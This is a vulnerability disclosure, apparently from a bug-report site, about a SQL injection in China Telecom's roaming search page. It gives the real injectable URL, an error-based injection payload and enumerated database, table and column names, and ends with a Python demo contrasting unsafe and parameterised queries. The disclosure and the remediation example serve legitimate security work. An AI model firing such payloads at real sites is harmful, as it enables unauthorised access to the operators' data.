China Telecom international roaming: SQL injection in the search function. Type 1' (with a single quote) into the search box and the page errors out. The key information in the response is:
org.springframework.web.util.NestedServletException: Request processing failed; nested exception is org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a WHERE upper(a.keyName) like '%1'%' and a.isValid=1 order by orders desc) t]; nested exception is java.sql.SQLException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and a.isValid=1 order by orders desc) t' at line 1
org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:656)
org.springframework.web.servlet.FrameworkServlet.doGet(FrameworkServlet.java:549)
javax.servlet.http.HttpServlet.service(HttpServlet.java:617)
javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
The input is concatenated straight into the SQL statement. Locate an injection point:
http://manyou.189.cn/search//front/search.do?key=1&className=%E8%87%AA%E5%8A%A9%E6%9C%8D%E5%8A%A1
payload: key=1' AND (SELECT 3497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,113,102,58),(SELECT (CASE WHEN (3497=3497) THEN 1 ELSE 0 END)),CHAR(58,100,101,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'eDxm'='eDxm&className=自助服务
The injection results are as follows:
available databases [3]:
[*] information_schema
[*] jsearch
[*] manyouideal
Database: manyouideal [1 table]
+--------------+
| km_gm_common |
+--------------+
Database: manyouideal
Table: km_gm_common [42 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| CALL_CHINA_NO_HK   | varchar(1000) |
| CALL_NATIVE        | varchar(1000) |
| CALL_OTHER_COUNTRY | varchar(800)  |
| CARDTYPE           | varchar(1000) |
| CARDTYPESORT       | int(11)       |
| CDMA1X             | varchar(500)  |
| CITY               | varchar(1000) |
| CONSULATE_PHONE    | varchar(500)  |
| COUNTRY            | varchar(1000) |
| COUNTRY_AREA       | varchar(500)  |
| COUNTRY_CODE       | varchar(500)  |
| COUNTRY_NAME_EN    | varchar(500)  |
| EMBASSY_PHONE      | varchar(500)  |
| EMERGENCY_PHONE    | varchar(500)  |
| FREQUENCY_RANGE    | varchar(500)  |
| GPRS               | varchar(500)  |
| HEAD_133           | varchar(800)  |
| ID                 | int(11)       |
| IDCODE             | varchar(50)   |
| INTERNET           | varchar(300)  |
| JIANPIN            | varchar(50)   |
| MIFI               | varchar(300)  |
| MSG_CHAR_LIMIT     | varchar(500)  |
| NATIVE_MOBILEPHONE | varchar(500)  |
| NATIVE_TALK        | varchar(500)  |
| NETWORK            | varchar(1000) |
| NETWORK_DEFAULT    | varchar(500)  |
| NOTICE             | varchar(1500) |
| OLDID              | int(11)       |
| OUTLET             | varchar(100)  |
| PINYIN             | varchar(50)   |
| RECEIVE_CALL       | varchar(800)  |
| RECEIVE_CODE       | varchar(500)  |
| RECEIVE_SHORTMSG   | varchar(500)  |
| REMOTE_MOBILEPHONE | varchar(500)  |
| REMOTE_TALK        | varchar(500)  |
| SEND_CHINA_LAND    | varchar(500)  |
| SEND_OTHER_COUNTRY | varchar(500)  |
| SHORTMSG_CODE      | varchar(500)  |
| SORTNUMER          | int(11)       |
| VOLTAGE            | varchar(200)  |
| WIFI               | varchar(500)  |
+--------------------+---------------+
Database: jsearch [25 tables]
+------------------------------+
| country                      |
| t_lucene_ad                  |
| t_lucene_class               |
| t_lucene_config              |
| t_lucene_content             |
| t_lucene_datasource          |
| t_lucene_ftpserverlist       |
| t_lucene_hotlabels           |
| t_lucene_indexlogs           |
| t_lucene_indextask           |
| t_lucene_indextask_ftpserver |
| t_lucene_keyrecovery         |
| t_lucene_keywordhits         |
| t_lucene_keywordhits_0612    |
| t_lucene_keywords            |
| t_lucene_minganci            |
| t_lucene_module              |
| t_lucene_profile             |
| t_lucene_relatedkeywords     |
| t_lucene_searchserver        |
| t_lucene_servernode          |
| t_lucene_typehits            |
| t_lucene_users               |
| t_lucene_visitlog            |
| t_lucene_weight              |
+------------------------------+
This is only search-index data, but it still deserves attention.
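The query leaked in the stack trace shows the search term being pasted into the LIKE literal. The following Python/sqlite3 model is an added example, not code from the original report or from the site (which uses Spring JDBC); it rebuilds that query against a constructed in-memory table (table and column names from the error message, rows invented) and sets it beside a bound-parameter version that also escapes LIKE wildcards, so the same single-quote input produces a database error in one and an ordinary empty result in the other.

```python
import sqlite3

def build_db():
    # Constructed in-memory stand-in for the keyword table; the table and
    # column names come from the error message, the rows are invented.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_LUCENE_RELATEDKEYWORDS "
                 "(keyName TEXT, isValid INTEGER, orders INTEGER)")
    conn.executemany(
        "INSERT INTO T_LUCENE_RELATEDKEYWORDS VALUES (?, ?, ?)",
        [("roaming rates", 1, 2), ("100% coverage", 1, 1), ("old entry", 0, 3)],
    )
    return conn

def count_unsafe(conn, key):
    # The pattern the stack trace reveals: the raw search term is pasted
    # into the LIKE literal, so a quote breaks out of the string.
    sql = ("select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a "
           f"WHERE upper(a.keyName) like '%{key}%' and a.isValid=1 "
           "order by orders desc) t")
    return conn.execute(sql).fetchone()[0]

def count_safe(conn, key):
    # Hardened form: the term travels as a bound parameter, and LIKE
    # metacharacters are escaped so the user cannot widen the pattern.
    escaped = key.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("select count(*) from (select * from T_LUCENE_RELATEDKEYWORDS a "
           "WHERE upper(a.keyName) like ? escape '\\' and a.isValid=1 "
           "order by orders desc) t")
    return conn.execute(sql, (f"%{escaped}%",)).fetchone()[0]

def probe(conn, fn, key):
    # Return the count, or the database error text that the site leaked
    # to the browser instead of a generic error page.
    try:
        return fn(conn, key)
    except sqlite3.Error as exc:
        return f"error: {exc}"

def demo():
    conn = build_db()
    return {
        "normal_unsafe": probe(conn, count_unsafe, "roaming"),  # 1
        "normal_safe": probe(conn, count_safe, "roaming"),      # 1
        "quote_unsafe": probe(conn, count_unsafe, "1'"),        # error: ...
        "quote_safe": probe(conn, count_safe, "1'"),            # 0
        "wildcard_unsafe": probe(conn, count_unsafe, "%"),      # 2, every valid row
        "wildcard_safe": probe(conn, count_safe, "%"),          # 1, literal '%' only
    }
```

Calling demo() returns the six results; the wildcard pair shows that binding alone is not enough for LIKE, the metacharacters also need escaping.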